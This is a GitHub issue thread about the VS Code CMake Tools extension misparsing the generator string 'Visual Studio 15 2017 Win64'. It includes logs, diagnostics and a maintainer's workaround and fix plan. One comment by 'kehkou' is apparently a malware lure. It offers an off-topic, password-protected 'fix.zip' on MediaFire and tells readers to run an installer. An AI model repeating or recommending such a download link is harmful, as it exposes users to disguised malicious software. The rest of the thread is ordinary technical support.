### ISSUE TITLE
cannot parse cmake.generator correctly

### ISSUE THREAD

**Issue by nicolgo** [microsoft/vscode-cmake-tools#4020]
### Brief Issue Summary

my previous setting of cmake.generator is `"Visual Studio 15 2017 Win64"`, it work well before, but when I update the extension to v1.19.49 today, it cannot parse the string correctly, 

```
[proc] Executing command: "C:\Program Files\CMake\bin\cmake.EXE" -DCMAKE_BUILD_TYPE:STRING=RelWithDebInfo -DCMAKE_EXPORT_COMPILE_COMMANDS:BOOL=TRUE --no-warn-unused-cli -SC:/Users/dell/Documents/repos/fpcserver -Bc:/Users/dell/Documents/repos/fpcserver/build-RelWithDebInfo -G "Visual Studio 15 2017" -A " Win64"
```

but I change the setting to `"cmake.generator": "Visual Studio 15 2017Win64"`, it can parse correctly.

### CMake Tools Diagnostics

```shell
{
  "os": "win32",
  "vscodeVersion": "1.85.1",
  "cmtVersion": "1.19.49",
  "configurations": [
    {
      "folder": "c:\\Users\\dell\\Documents\\repos\\fpcserver",
      "cmakeVersion": "3.26.4",
      "configured": false,
      "generator": "Visual Studio 15 2017",
      "usesPresets": false,
      "compilers": {}
    }
  ],
  "cpptoolsIntegration": {
    "isReady": false,
    "hasCodeModel": false,
    "activeBuildType": "",
    "buildTypesSeen": [],
    "requests": [],
    "responses": [],
    "partialMatches": [],
    "targetCount": 0,
    "executablesCount": 0,
    "librariesCount": 0,
    "targets": []
  },
  "settings": [
    {
      "communicationMode": "automatic",
      "useCMakePresets": "auto",
      "configureOnOpen": true
    }
  ]
}
```

### Debug Log

```shell
[cmake] -- Configuring incomplete, errors occurred!
[proc] The command: "C:\Program Files\CMake\bin\cmake.EXE" -DCMAKE_BUILD_TYPE:STRING=RelWithDebInfo -DCMAKE_EXPORT_COMPILE_COMMANDS:BOOL=TRUE --no-warn-unused-cli -SC:/Users/dell/Documents/repos/fpcserver -Bc:/Users/dell/Documents/repos/fpcserver/build-RelWithDebInfo -G "Visual Studio 15 2017" -A " Win64" exited with code: 1
```

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nicolgo** [comment]
Hi @gcampbell-msft, I attached a small project, you just need to change the `"cmake.generator": "Visual Studio 15 2017Win64"` in `.vscode/settings.json` to `"cmake.generator": "Visual Studio 15 2017 Win64"`, and `ctrl+shift+p` run `CMake: Delete Cache and Reconfigure`, you will find one can success, one will fail.
[helloworld.zip](https://github.com/user-attachments/files/16801062/helloworld.zip)

**Comment by gcampbell-msft** [comment]
Thanks @nicolgo. 

I've investigated this and it looks like a recent improvement we've made exposed the fact that we don't currently support the edge case of generators that were supported in CMake versions prior to 3.1. From the docs here: https://cmake.org/cmake/help/latest/generator/Visual%20Studio%2015%202017.html#platform-selection, it looks like you could be using simply "Visual Studio 15 2017", based on your cmake version, and then you could set the `cmake.platform` version. 

We also could fix the interpretation we do here: https://github.com/microsoft/vscode-cmake-tools/blob/96f67f1c93a351f8dd5c7df8b99ca2defe1be099/src/drivers/cmakeDriver.ts#L1011, to make sure that we use a `-A "x64"` rather than `-A "Win64"`

**Comment by gcampbell-msft** [comment]
@nicolgo Could you let me know whether simply using `Visual Studio 15 2017` works for you?

**Comment by nicolgo** [comment]
@gcampbell-msft yes, setting `"cmake.generator": "Visual Studio 15 2017"` works well, the platform will be `-A "x64"` by default. Thank you~

**Comment by gcampbell-msft** [comment]
Great. I'll close this issue for now, but we do plan to implement a fix that I have in this draft PR #4025, but it will likely stay in pre-release until we do the official 1.20 release in 3 months. Please let us know if you feel strongly about getting this into the official release channel sooner than that. 

Thanks!
